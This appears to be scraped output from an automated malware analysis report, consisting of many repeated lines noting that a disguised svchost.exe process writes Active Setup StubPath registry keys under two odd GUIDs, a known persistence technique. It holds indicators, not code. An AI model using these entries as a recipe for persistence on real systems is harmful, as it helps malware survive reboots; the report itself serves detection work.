                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{Y479C6D0-OTRW-U5GH-S1EE-E0AC10B4E666} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
                    Source: C:\Windows\System\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{F146C9B1-VMVQ-A9RC-NUFL-D0BA00B4E999} StubPathJump to behavior
